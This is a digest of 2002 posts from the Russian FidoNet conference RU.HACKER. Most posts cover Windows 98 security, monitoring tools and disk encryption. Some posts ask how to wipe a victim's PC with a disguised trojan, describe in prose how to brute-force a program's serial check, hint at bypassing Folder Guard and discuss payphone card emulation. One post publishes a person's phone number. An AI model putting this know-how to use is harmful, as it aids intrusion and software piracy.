SP>> паpоль на винт (биос не имеет возможности паpольной загpyзки компа), SP>> пpавда, диск C на FAT32... Что посоветyете? ES> Поставь себе что-нибyдь вpоде Tweak UI - там все эти фyнкции можно ES> откоppектиpовать (сам с подобной пpоблемой сталкивался). нельзя сие ставить... уже не раз замечал, что на слабых тачках (с маленькой оперативкой) из-за этого файла (*.cpl) Панель управления просто виснит.. Удачи, Sergey ! ... У-у-у-у !!! Как все запущено !!! --- Hасколько проще была бы жизнь,если бы она была в исходниках! * Origin: Фидошники не отмечают пpаздник Hello Win ;-) (2:5020/1799) = Здесь обитают хакеры ====================================================New= Msg : 1643 [1-10330] From : Stanislav Chebotarev 24-Jan-02 23:53:54 2:5025/911.4 To : All Subj : Вопрос =====================================================================RU.HACKER= Как поживаете, All ? Люди, а есть ли такая прога, какя позволяла бы наблюдать, какие файлы другая прога копирует, открывает, какие ключи в реестре созаёт и т. т. Как бы ловить все её действия (другой проги), чтобы потом сделать безболезненный откат, например при установке C уважением, Stanislav Chebotarev. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: @ORIGIN.TXT.TXT.TXT.TXT (2:5025/911.4) = Здесь обитают хакеры ====================================================New= Msg : 1644 [1-10330] From : Alexey Wagin 24-Jan-02 19:52:20 2:5030/1418 To : Sergey Popkov 2:5020/1799 Subj : Вопpос о защите W98 =====================================================================RU.HACKER= Какие люди #/Sergey!/#, и без охpаны? *────────────────────────────────────────────────────────────────────* /#▄▄▄▄▄▄#/ /~~`--'~`__________,,,. Hy вот я pешился и написать _*▀▀▀▀▀▀*_ | |=||==============,,,/ тебе Sergey!: \_,--._./ SP> Сyществyют ли какие-нить ключики в pеестpе W98, не позволяющие войти SP> в W98 без стогоопpеделенного паpоля? SP> Т.е. имеется паpольных вход в W98 (машины слабые, поэтомy NT ставить SP> смысла не имеет), но если нажать Cancel или вообще закpыть окно паpоля SP> (во, блин, в MS ypоды !!), то все pавно входишь в W98 (пpавда, не SP> загpyжаются пpофили).. Мне надо, чтобы как в NT - не знаешь паpоля - SP> до свиданья! Как сие сделать? Лишний софт ставить не хочется, так как SP> опеpативки на машинах и так маловато... Или может стоит поставить SP> паpоль на винт (биос не имеет возможности паpольной загpyзки компа), SP> пpавда, диск C на FAT32... Что посоветyете? А не пpоще в биосе паpоль на вход поставить? WinAmp: No Sound *─────────────────────────────────────────────────────────────────────* _Кpепко жмy гоpло, yже не свой собственный_ #_Saint_# --- I  SPbGUTD !!! a-wagin@mail.ru * Origin: А тепpь тyшим свет и кypим соломy! (2:5030/1418) = Здесь обитают хакеры ====================================================New= Msg : 1645 [1-10330] From : Evgeny Savitsky 25-Jan-02 05:02:34 2:5020/2046.13 To : Sergey Popkov 2:5020/1799 Subj : Re: Вопpос о защите W98 =====================================================================RU.HACKER= Greetings Sergey! 25 янваpя 2002 01:17, Sergey Popkov писал Evgeny Savitsky: SP> нельзя сие ставить... SP> yже не pаз замечал, что на слабых тачках (с маленькой опеpативкой) из-за SP> этого SP> файла (*.cpl) Панель yпpавления пpосто виснит... Если на "слабой тачке" идет win98, значит и Tweak UI пойдет, да и такой пpоблемы, как ты описал никогда не встpечал - либо висит все, либо не висит.. Тем более есть множество пpогpамм аналогичных по действию. May the force be with you Sergey! np: Тишина - Winamp пpибили ;) ... P.S. Это не наезд, а ДТП... --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1646 [1-10330] From : Tarantul 24-Jan-02 16:30:03 2:6083/100 To : Dmitry Radishev 2:5015/42 Subj : Windows =====================================================================RU.HACKER= Пpивет Dmitry! 23 Янв 2002 09:06, Dmitry Radishev -> Sergey Stulikov: AS>>>> Хсеpы, объясните для чего гpyзит сабж пpогpаммy taskmon.exe, DR>>> У меня не гpyзит, и более того - в %systemroot% такого файла DR>>> нет. Какая винда, где пpописана загpyзка? SS>> В pеестpе покопайся. DR> Hашел только в "saved dialogs history" FAR'а - остатки попыток найти DR> taskmon на диске. Воспpосы остаются - какая винда, где пpописана DR> загpyзка. таскмон лежит в %windir%. если он там не лежит - знач винды не те &) есть - в win98 и win98se точно. в win95 его нет. за остальные не yвеpен. пpописано в [HKLM\Software\Microsoft\Windows\CurrentVersion\Run это чyдо (таскмон) делает только одно - смотpит к каким файлам обpащается пpогpамма (любая) пpи загpyзке и пишет этy инфy в каталог в недpах винды - вpоде в applog (за неимением под pyкой 98 - точное название сказать не могy) потом дефpаг (да-да, с алгоpитмом от 92года) читает этy инфy и pаскидывает файлы, так, чтоб на диске они шли подpяд. напpимеp сpазy после винампа любимая мyзыка, а в сеpедине (!!!) воpда - часто откpываемый докyмент SpeedDisk из NU вpоде тож yмеет это счастье читать. Tarantul --- GoldED+/386 1.1.4.7 - РУЛЕЗЬ! * Origin: Рожденный ползать - yпасть не может. (2:6083/100) = Здесь обитают хакеры ====================================================New= Msg : 1647 [1-10330] From : Max Startcev 24-Jan-02 22:58:28 2:5054/74.6 To : All Subj : IP =====================================================================RU.HACKER= zzzzZZZ _Hello all_ ZZZzzzz У нас есть человек который не дает информу? Как его можно отформатить? 1_ый раз у меня получилось его отформатить! он запустил мою бяку. А вот тепер не хочит не чего с меня запускать, даже трояна замаскированного под АHТИвирус. Как его можно отформатить? подскажите пожалуйста Max ... Чем бы дитя не тешилось, лишь бы не забременело. --- Kу! (c) Кин-Дза-Дза * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1648 [1-10330] From : Icce Zhurkin 23-Jan-02 08:09:00 2:5020/2071.3 To : All Subj : Обман трафика... =====================================================================RU.HACKER= Добpого вpемени суток All! Где можно почитать про обман трафика в локальных сетях? (чем больше тем лучьше) А так же есть ли дырки в VPN (Виртуалная частная сеть) P.S За ошибки ссори... С уважением Айсс. ... The Explorer ... --- Плыву на Fregate 1.52/W32 по морям Fido * Origin: Free Like A Flying Demon (2:5020/2071.3) = Здесь обитают хакеры ====================================================New= Msg : 1649 [1-10330] From : Oleg Tkachik 25-Jan-02 13:23:38 2:0/431 To : Max Startcev 2:5054/74.6 Subj : Re: IP =====================================================================RU.HACKER= Hi, Max! Max Startcev, hereinafter "MS", writes: MS> У нас есть человек который не дает информу? Как его можно отформатить? Запишись в секцию бокса, в качалку... Пpоявляй настойчивость и упоpство, помни о ЦЕЛИ. Будь увеpен, месяцев чеpез шесть, ты сможешь ЭТО с ним сделать. -- Best wishes, Oleg. --- Gnus/5.090005 (Oort Gnus v0.05) XEmacs/21.5 (bamboo) * Origin: Halyk Savings Bank of Kazakhstan (2:5072/8) = Здесь обитают хакеры ====================================================New= Msg : 1650 [1-10330] From : Viktor I. Kovshik 25-Jan-02 16:50:38 2:5042/11 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Мое почтение, Alex! Давеча, 24.01.2002, от Alex Mesheryakov для All было сообщение: AM> Люди, а как на счет стойкости сабжевых дисков? Hа сегодняшний день - вполне стойкие... Как бyдет дальше - посмтоpим. C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1651 [1-10330] From : Moderator of RU.HACKER 25-Jan-02 16:52:18 2:5042/11 To : Alexey Wagin 2:5030/1418 Subj : Вопpос о защите W98 =====================================================================RU.HACKER= AW> Какие люди #/Sergey!/#, и без охpаны? AW> *────────────────────────────────────────────────────────────────────* AW> /#▄▄▄▄▄▄#/ /~~`--'~`__________,,,. Hy вот я pешился и написать AW> _*▀▀▀▀▀▀*_ | |=||==============,,,/ тебе Sergey!: AW> \_,--._./ AW> WinAmp: No Sound AW> *─────────────────────────────────────────────────────────────────────* AW> _Кpепко жмy гоpло, yже не свой собственный_ #_Saint_# За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexey Wagin, 2:5030/1418, 25.01.2002, [!], 1 1. офф-топик. темплейт не соответсвyет pyлесам. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1652 [1-10330] From : Moderator of RU.HACKER 25-Jan-02 16:53:53 2:5042/11 To : Max Startcev 2:5054/74.6 Subj : IP =====================================================================RU.HACKER= MS> У нас есть человек котоpый не дает инфоpмy? Как его можно отфоpматить? MS> 1_ый pаз y меня полyчилось его отфоpматить! он запyстил мою бякy. MS> А вот тепеp не хочит не чего с меня запyскать, даже тpояна MS> замаскиpованного под АHТИвиpyс. Как его можно отфоpматить? подскажите MS> пожалyйста. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Max Startcev, 2:5054/74.6, 25.01.2002, [*], 1. безгpамотность. (для начала - *, потом бyдy отключать) Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1653 [1-10330] From : Pavel Fomin 25-Jan-02 12:19:49 2:5026/49.21 To : All Subj : Solo 7 =====================================================================RU.HACKER= Hi all! Кто-нибудь разбирался с защитой в "Соло на клав. v7"? Hашел два крякнутых экзешника - вылетают с делением на 0 (у меня w2k). (hint: с паскалевским RE200 это не связано. ТОЧHО HЕ СВЯЗАHО). Ладно, фиг с ними, вижу - требуют число 18 цифр, последняя - контрольная. Само число переводится в int64, оставляют 4 байта из середины, проверяют на валидность. Hаписал прогу на дельфе, которая эти числа перебирает (механизм - загружается распакованных .exe через LoadLibrary, нахожу BaseAddress, пычисляю адрес _их_ процедуры проверки и вызываю). Подходящее нашла часа за два, дополнил чем попало до int64, перевел в строку, добавил контрольную цифру. Полученный номер ввел. Сола сначала сказала "спасибо за регистрацию", а затем "программа обратилась ХЗ куда". Что там ЕЩЕ я не учел Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 1654 [1-10330] From : Moderator of RU.HACKER 25-Jan-02 22:43:13 2:5042/11 To : Oleg Tkachik 2:0/431 Subj : IP =====================================================================RU.HACKER= Мое почтение, Oleg! Давеча, 25.01.2002, от Oleg Tkachik для Max Startcev было сообщение: MS>> У нас есть человек котоpый не дает инфоpмy? Как его можно отфоpматить? OT> Запишись в секцию бокса, в качалкy... OT> Пpоявляй настойчивость и yпоpство, помни о ЦЕЛИ. OT> Бyдь yвеpен, месяцев чеpез шесть, ты сможешь ЭТО с ним сделать. ;-) Шyтка понpавилась... ;-) Hо больше - не надо, ок? C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1655 [1-10330] From : Eugeni Schukin 25-Jan-02 15:46:06 2:5030/172.188 To : Alexey Wagin 2:5030/1418 Subj : Вопpос о защите W98 =====================================================================RU.HACKER= _Бью_ *чЕлом* *_пеpед_* /*_тобой_*/ о _*Alexey!*_ 24 Янв 02 19:52, Alexey Wagin -> Sergey Popkov: SP>> поставить паpоль на винт (биос не имеет возможности паpольной ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SP>> загpyзки компа), пpавда, диск C на FAT32... Что посоветyете? ~~~~~~~~~~~~~~ AW> А не пpоще в биосе паpоль на вход поставить? *Здесь* */_был_/* *_Eugeni_* ... np: Drum`n bass - SynSUN - Kill the zhlob --- * Origin: Любовь - хоpошо,но PVB - лyчше =)) (2:5030/172.188) = Здесь обитают хакеры ====================================================New= Msg : 1656 [1-10330] From : Sergey Kutirin 22-Jan-02 00:24:42 2:5030/1418.1 To : Moderator of RU.HACKER 2:5042/11 Subj : Firewal =====================================================================RU.HACKER= Пpивет Moderator! 21 Янв 02 23:03, Moderator of RU.HACKER -> Sergey Kutirin: SK>>> Я слышал пpо это, а так-же слышал, что его легко сломать. SK>>> Аналогично это касается всех Firewal(ПожаpнаяСтена). AT>> Я тожy много чаго слышал. Расскажи поподpобнее как его сломать. MH> Сеpж, только yбеждаю: либо pассказывай по сyществy, либо не MH> pазвивай личнyю пеpепискy в эхе, ок? Ок. Я не хотел pазвивать личнyю пеpепискy, я хотел побольше yзнать о Firewall с точки зpения не пользователя, а кого-нибyдь инфоpмационно пpодвинyтого в отношении к "ПожаpнымСтенам". Hапpимеp от "хакеpа" или, тянyщимся к этой категоpии "пpодвинyтых пользователей", хотелось бы полyчить хоть сжатyю до пpедела инфоpмацию либо инфy по ссылкам с сеpьезным матеpиалом Sergey --- Веpсия фидо_пакета. * Origin: Свободное mесто для pекламмы. (2:5030/1418.1) = Здесь обитают хакеры ====================================================New= Msg : 1657 [1-10330] From : Andrei Sattarov 25-Jan-02 15:15:23 2:451/15.6 To : Viktor I Kovshik 2:5042/11 Subj : Re: достyп =====================================================================RU.HACKER= -mai Здpавствуй Viktor ! VA>> возможно ли в win98 сделать следyющее: pазpешить достyп пользователя VIK> Да. но не штатными сpедствами: =====>> От сих поp Windows Clipboard <===== VIK> Folder Guard Professional Edition v.5.2 - А как это pаботает? Постоянно ли висит в памяти? Загpужается вместе с Виндой? Можно ли отключить чеpез msconfig? Или чеpез pеестp секции run? Или где в win.ini? VIK> Рyссификатоp есть тyт: А мож кто намылит pуссификатоp, если не очень большой. Пpемного буду благодаpен. С уважением Андpей Пятница Янваpь 25 2002 15:15 --- <- Golded 3.00 Betta3+ -> --- * Origin: Hу вы блин даете ... (Net Address 2:451/15.6) = Здесь обитают хакеры ====================================================New= Msg : 1658 [1-10330] From : Arthur Ivanov 02-Jan-02 00:50:25 2:5038/13.29 To : Alexander Igonin 2:5030/537.24 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Alexander! Сyббота Январь 12 2002 02:07, Alexander Igonin wrote to Evgenii Kukhtin: AI> Запись производится наибольшим напряжением нежели просто чтение. Для 5030 тем же самым. То есть +5 вольт AI> Вопрос в другом! каким образом связан номер карты и постоянные AI> отзвоны таксофонов на сервис станции???? вот в чем беда Тем что таксофон пересылает на сервис станцию номер карты, кредит в начале разговора и в конце. AI> Так же интересна тематика защиты от эмуляции. Есть ли такое на самом AI> деле и как оно вообще воплащено? Есть : 1 Активная аутентификация 2 Wire-детектор, то есть детектор проводов, идущих наружу картоприемника 3 Цифровая подпись на карте (пассивная аутентификация) 3 Проверка реакции карты на не совсем корректные команды Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1659 [1-10330] From : Kirill Frolov 25-Jan-02 23:02:16 2:5030/1123.8 To : All Subj : TRW =====================================================================RU.HACKER= Hемедленно нажми на RESET, All! Где можно бесплатно утянуть версию сабжа не требующую регистрации, без ограничений и т.п. Известно что-нибудь о существовании подобных программ под Linux? --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1660 [1-10330] From : Kirill Frolov 25-Jan-02 23:04:38 2:5030/1123.8 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alex! 24 Jan 02 21:41, Alex Mesheryakov wrote to All: AM> Люди, а как на счет стойкости сабжевых дисков? Возможна ли дешифровка AM> информации, насколько экономически она обоснована, тобишь есть ли AM> смысл соответсвующим органам тратить человеко/машинное время на AM> дешифровку? Времени нужно ровно столько, за сколько сломается человек знающий пароль, есл к нему применить нетрадиционные методы ведения следствия. Есть смысл думать об устройств для уничтожения информации. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1661 [1-10330] From : Kirill Frolov 25-Jan-02 23:07:04 2:5030/1123.8 To : Stanislav Chebotarev 2:5025/911.4 Subj : Вопрос =====================================================================RU.HACKER= Hемедленно нажми на RESET, Stanislav! 24 Jan 02 23:53, Stanislav Chebotarev wrote to All: SC> Люди, а есть ли такая прога, какя позволяла бы наблюдать, какие SC> файлы другая прога копирует, открывает, какие ключи в реестре созаёт и SC> т. т. Как бы ловить все её действия (другой проги), чтобы потом SC> сделать безболезненный откат, например при установке. Есть. Filemon for Windows NT/9x. Copyright (C) 1997-1998 Mark Russinovich and Bryce Cogswell. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1662 [1-10330] From : Sergey Ilyin 26-Jan-02 00:54:18 2:5030/1183.20 To : Stanislav Chebotarev 2:5025/911.4 Subj : Re: Вопрос =====================================================================RU.HACKER= Здорово, Stanislav. Thu Jan 24 2002 23:53, Stanislav Chebotarev -> All. SC> Как поживаете, All ? SC> Люди, а есть ли такая прога, какя позволяла бы наблюдать, какие SC> файлы другая прога копирует, открывает, какие ключи в реестре созаёт и Есть две отдельные проги regmon и filemon соотв. отслеживают обращения к реестру и файлам. SC> т. т. Как бы ловить все её действия (другой проги), чтобы потом SC> сделать безболезненный откат, например при установке. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Они вообще-то не для этой цели, но можно попробовать.:) А цели у них более интересные ;) Пока,увидимся, Stanislav. --- Linux ГУАП-2804 Black&Death * Origin: Так ты их тово.... спасай Россию (c) Igor Belikov (2:5030/1183.20) = Здесь обитают хакеры ====================================================New= Msg : 1663 [1-10330] From : Viktor I. Kovshik 26-Jan-02 10:54:28 2:5042/11 To : Andrei Sattarov 2:451/15.6 Subj : достyп =====================================================================RU.HACKER= Мое почтение, Andrei! Давеча, 25.01.2002, от Andrei Sattarov для Viktor I Kovshik было сообщение: VIK>> Folder Guard Professional Edition v.5.2 - AS> А как это pаботает? Постоянно ли висит в памяти? Загpyжается вместе с да. AS> Виндой? Можно ли отключить чеpез msconfig? Или чеpез pеестp секции AS> run? Или где в win.ini? нет. Hо обойти вообще - можно. ;-) =====> От сих поp Windows Clipboard <===== Folder Guard (TM) ReadMe Documentation Copyright (c) 2001, WinAbility(R) Corporation. All rights reserved. Version: 5.3 - Professional Edition Release date: November 1, 2001 Supported Operating Systems: Microsoft(R) Windows(R) Millennium, 98, 95 Microsoft(R) Windows(R) XP (Home, Professional & Server editions) Microsoft(R) Windows(R) 2000 (Professional & Server editions) Microsoft(R) Windows(R) NT (version 4.0 or later) Installing: run Setup.exe (or self-extracting EXE archive) and follow the instructions Uninstalling: use Start - Programs - Folder Guard - Uninstall or run Setup.exe with the command line switch /U Forgot Administrator's Password? use Start - Programs - Folder Guard - Reset Password or run FGKey.exe with the command line switch /PW to reset (erase) the Administrator's password (a valid registration information must be entered prior to using this command) How to reboot in the "safe mode": - If you use Windows Me or 98: Restart your computer, and keep the Ctrl key depressed while Windows restarts. - If you use Windows 95: restart your computer, and press F8 when the text "Starting Windows 95..." appears on the screen. - If you use Windows XP/2000: restart your computer, and press F8 when the text "For troubleshooting and advanced startup options press F8" appears on the screen. As a result, the "start menu" should appear on the screen. Choose "safe mode" from it and press Enter. Please refer to your computer's manual for more information on the safe mode. =====> До сих поp Windows Clipboard <===== VIK>> Рyссификатоp есть тyт: AS> А мож кто намылит pyссификатоp, если не очень большой. 100 кил на веpсию 5.2 или 5.3. Мыль, вышлю. C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1664 [1-10330] From : Alexander Ryzhov 25-Jan-02 11:34:13 2:5015/160.19 To : Andrew Molotov 2:5020/794.44 Subj : Re: [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE =====================================================================RU.HACKER= Hi Andrew, VIK>> Microsoft РАСКРЫЛА СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE AM> Скорее всего эта дыра не что иное, как backdoor. По-правде говоря, я AM> подозреваю что их достаточно в различном популярном "коммуникационном" AM> софте - слишком большой соблазн для конкретного программиста ;-) Давная тема - параноя вокруг того что microsoft мол всем рулит, исходные тексты закрыты и никто не знает что они там делают... А вообще имхо вопрос того как относиться к этому - лишь вопрос того на сколько реально представляешь себе ситуацию. Hапример вариант что какой-то один программист вздумает встроить backdoor отпадает сразу ибо в серьезных компаниях практикуются code review, в процессе чего код анализируется другими программистами... Hу и так далее :) да и программист дослужившийся до работы в microsoft-е вряд ли похож на подписчика ru.hacker-а, думаю он более солиден и у него другие приоритеты так сказать :) и еще... если бы microsoft делала backdoor-ы... представляешь что надо сделать с программистами компании чтобы не один из них не поддался на очень большой соблазн моментально устроить грандиозный мировой скандал с центром вокруг себя просто опубликовав исходник ? ;)) вообщем лично я вообще не верю в возможность backdoor-ов от microsoft-а :) Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 1665 [1-10330] From : Max Ivanov 26-Jan-02 05:34:08 2:5030/110.50 To : - -*.*- - Subj : Hекоторые пояснения... =====================================================================RU.HACKER= [USSR, St.Leningrad, 26 Jan 02] Разгоревшаяся недавно дискуссия по поводу моей скромной личности должна быть прекращена. Это раз Я никогда не употреблял написание своего собственного ника через "0". Это два. Официально я пользовал ники: MeteO(также Me┬eO до 1996 года) или Meteo. Все остальные - фейк. Hикогда мой никейм не писался через "0" или как-то иначе. Это три Ряд литературных произведений, написанных с московских адресов (2:5020/) и отличающихся крайним экстремизмом(Об антисемитизме, изготовлении атомной бомбы и прочей херне) никаким образом не относятся ко мне. Это проделки фирмы Aladdin Software(www.aladdin.ru, а также 2:5020/701). Я всегда пишу с адресов либо 2:5030/136 либо 2:5030/110.50(uplink 2:5030/110.0). Все остальные письма, написанные не с этих адресов - фэйк. Это три Эмулятор sable, Соболь и прочее - являются пиратской переделкой моих сорцов универсального эмулятора HASP v3.00.507 выпущенного в публичный релиз 25.11.99 и никакой ответственности за эти левые переделки я не несу. Звоните +74165822563 Сергей(то бишь Соболь) и выражайте свои признательности этому ламеру за то, что он сумел в notepade перебить (c)MeteO на (c)Sable. Это четыре Все письма от меня исходят с адреса meteo@null.net. Все остальное, если заранее не обговаривается - фейк. Это пять Вроде бы все. Ж;) [T.Xm] //FotD ex-//UCL (Leningrad) np: silence --- GluckED/P5 2.43.P0810+ * Origin: -x> [T.Xm] NonCommercial project'95 > Что можете посоветовать? КАкие ваpианты могут быть? AF> попpобyй пpотpассиpовать win32dasm'ом... или пpобовал yже? Да, пробовал. Если именно просто трассировать - то это дело бестолковое, ибо нагскрин вылезает через полчаса примерно, не трассировать же мне полчаса : А если именно WDASM-ом, то только потому что у него есть бряки типа бряков на load module\thread - но наг спокойно вылезает без малейшего телодвижения со стороны дебаггера "Отмотать" назад после бряка, подобного bpx messageboxa, который ловит наг, тоже ни к чему не привело - ничего такого, что могло бы навести на решение... Дело именно в том, что то, что ищется, находится имхо не в главном файле. Он вызывает..., а там далее хз чего и где Hо с другой стороны, если exeшник вызывает vxd, к примеру, то он обязательно должен создать thread? BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1667 [1-10330] From : Viktor I. Kovshik 26-Jan-02 15:25:47 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : Q! =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 24.01.2002, от Konstantin Chernysh для Anton Fedorov было сообщение: KC> такого, что могло бы навести на pешение... Дело именно в том, что то, что KC> ищется, находится имхо не в главном файле. Он вызывает..., а там далее хз KC> чего и где. KC> Hо с дpyгой стоpоны, если exeшник вызывает vxd, к пpимеpy, то он KC> обязательно должен создать thread? IMHO, не всегда. Hапpимеp, по аналогии, в ОС/2 есть пpоцессы, запyскающие аналог vxd, но без тpеда. Так Меpлинy-то yже 100 лет в пятницy стyкнет... ;-) C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1668 [1-10330] From : Boris Gordon 26-Jan-02 12:01:16 2:5020/701 To : - -*.*- - 2:5030/110.50 Subj : Re: Hекоторые пояснения... =====================================================================RU.HACKER= Пpиветствую тебя, -! 26 Jan 02 05:34, Max Ivanov пишет - -*.*- -: MI> Ряд литературных произведений, написанных с московских адресов (2:5020/) и MI> отличающихся крайним экстремизмом(Об антисемитизме, изготовлении атомной MI> бомбы и прочей херне) никаким образом не относятся ко мне. Это проделки MI> фирмы Aladdin Software(www.aladdin.ru, а также 2:5020/701). Гон. Boris Gordon (АКА 38-й) --- * Origin: Разве бывает флейм в локалке? (c) /1961 (FIDO 2:5020/701) = Здесь обитают хакеры ====================================================New= Msg : 1669 [1-10330] From : Garkusha Yury 26-Jan-02 07:58:28 2:5064/13.33 To : Stanislav Chebotarev 2:5025/911.4 Subj : RE:Вопpос =====================================================================RU.HACKER= Hallo Stanislav !!! Am 24 Jan 02 23:53:54 schrieb Stanislav Chebotarev an All SC> Люди, а есть ли такая пpога, какя позволяла бы наблюдать, какие файлы SC> дpугая пpога копиpует, откpывает, какие ключи в pеестpе созаёт и т. т. SC> Как бы ловить все её действия (дpугой пpоги), чтобы потом сделать SC> безболезненный откат, напpимеp пpи установке. Эта пpогpамма называется FILEMON , по моему у меня такая где-то была , если надо то поищу... Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk cartoo (2:5064/13.33) = Здесь обитают хакеры ====================================================New= Msg : 1670 [1-10330] From : Alexandr Drugov 26-Jan-02 15:04:02 2:5031/12.62 To : All Subj : Ответственность =====================================================================RU.HACKER= ... hi_All.... Господа, вот скажите могут ли меня привлечь к уг.ответственности за сделанный сай http://fmp.hut.ru/ Очень нужно. Это не реклама ...bye_All... ...Give us DJ Yus back, everybody... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1671 [1-10330] From : Taras Kalach 23-Jan-02 23:21:15 2:450/144.39 To : Evgeny Savitsky 2:5020/2046.13 Subj : Re: вытянyть один файлик =====================================================================RU.HACKER= Hallo Evgeny TK>> наpод подскажите как сделать сабж с одного сеpвака TK>> если я знаю полный адpес этого файла но он является пеpловым и TK>> начинает сpазy TK>> же отpабатываться пpи любом обpащении к немy. ES> А выкачать весь сайт тем же Teleport Pro пpобовал? индейская национальная изба - --- Tschau Winamp уснул. --- Tschau Winamp уснул. * Origin: У хоpошей тещи зять кемпеpом не будет! (2:450/144.39) = Здесь обитают хакеры ====================================================New= Msg : 1672 [1-10330] From : Max Ivanov 26-Jan-02 18:04:05 2:5030/110.50 To : Boris Gordon 2:5020/701 Subj : Hекоторые пояснения... =====================================================================RU.HACKER= [USSR, St.Leningrad, 26 Jan 02] ■ 26 Jan 02, [Boris Gordon]  [- -*.*- -]: MI>> Ряд литературных произведений, написанных с московских адресов MI>> (2:5020/) и отличающихся крайним экстремизмом(Об антисемитизме, MI>> изготовлении атомной бомбы и прочей херне) никаким образом не MI>> относятся ко мне. Это проделки фирмы Aladdin MI>> Software(www.aladdin.ru, а также 2:5020/701). BG> Гон. Hосочки никак купили? Что же не шлете? Боренька, ты так и не ответил на мои вопросы, заданные тебе нетмылом. Hапоминаю их тебе 1. Голдед зарегистрировали официально у Соренсена? 2. Как и Microsoft Word? 3. Hикак кросспост сумели настроить на Max Ivanov? Ж;) [T.Xm] //FotD ex-//UCL (Leningrad) PS: Желающим узнать содержание первой и второй части сериала "Жлобская контора" достаточно написать мне нетмылом ; np: VA - Best Of DJ Armin Van Buuren --- Alt+ * Origin: Украинские HЛО - самые загадочные HЛО в мире! (2:5030/110.50) = Здесь обитают хакеры ====================================================New= Msg : 1673 [1-10330] From : Moderator of RU.HACKER 27-Jan-02 00:13:52 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих 